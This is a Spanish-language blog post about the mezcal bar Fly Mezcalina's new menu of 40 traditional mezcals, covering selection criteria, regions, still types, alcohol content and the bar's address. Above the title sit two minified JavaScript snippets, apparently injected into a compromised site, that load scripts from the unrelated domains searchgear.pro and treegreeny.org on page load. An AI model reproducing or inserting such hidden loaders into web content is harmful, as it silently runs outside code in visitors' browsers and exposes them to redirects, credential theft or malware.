;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 64. Una carta que se antoja

64. Una carta que se antoja


A partir de hoy Red Fly, renombrado como Fly Mezcalina, puso a disposición de los Mezcólatras su nueva Carta de Mezcales Tradicionales, integrada por 40 maravillas que cumplen estrictamente los criterios siguientes: 1) están hechos con maguey maduro; 2) no se usaron químicos en su elaboración; 3) huelen y saben intensamente a maguey; 4) su fabricación se apegó al proceso cultural y tecnológico de la región de donde provienen; 5) la cocción del maguey se realizó en horno de tierra; 6) se destilaron en alambiques de destilación discontinua; 7) cuentan con una riqueza alcohólica mínima de 45 grados, según el Gusto Histórico de cada región, por lo que sí perlean; 8) no pasaron por barrica, pues ésto destruye los aromas y sabores más finos del maguey; 9) son de producción limitada y 10) se elaboraron en fábricas familiares y/o comunitarias.
Provienen de poblaciones de Durango, Estado de México, Guerrero, Jalisco, Michoacán, Oaxaca y Puebla. Se elaboraron con magueyes silvestres, cultivados y semisilvestres o semicultivados, cuyos tiempos de maduración oscilan entre 5 y 20 años, dependiendo de la variedad y del lugar donde hayan crecido.
Los aparatos usados en su destilación incluyeron: ollas de barro superpuestas; olla de barro con tronco de zompantle; alambique de cobre con tronco de higuera, alambique de cobre con tronco de oyamel; alambique de cobre con capitel de tiras de madera; alambique de cobre con olla de barro; alambique de cobre con capitel hueco de cobre; alambique con capitel y platillos de refinación de cobre.
Los hay de una o de dos destilaciones, dependiendo del tipo de destilador y del Gusto Histórico de cada población o región. Su riqueza alcohólica se encuentra entre los 46.2 y los 74.8 grados, y fue ajustada, en la mayoría de ellos, mezclando puntas y colas; en otros, con agua de manantial.
Para disfrutar perleados, aromas y sabores, hay que acudir a Fly Mezcalina: Orizaba 145, col. Roma, DF. Lunes a miércoles de 14 a 24 horas; jueves a sábado, 18 a 2 a.m.
http://impreso.milenio.com/node/8918287#

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *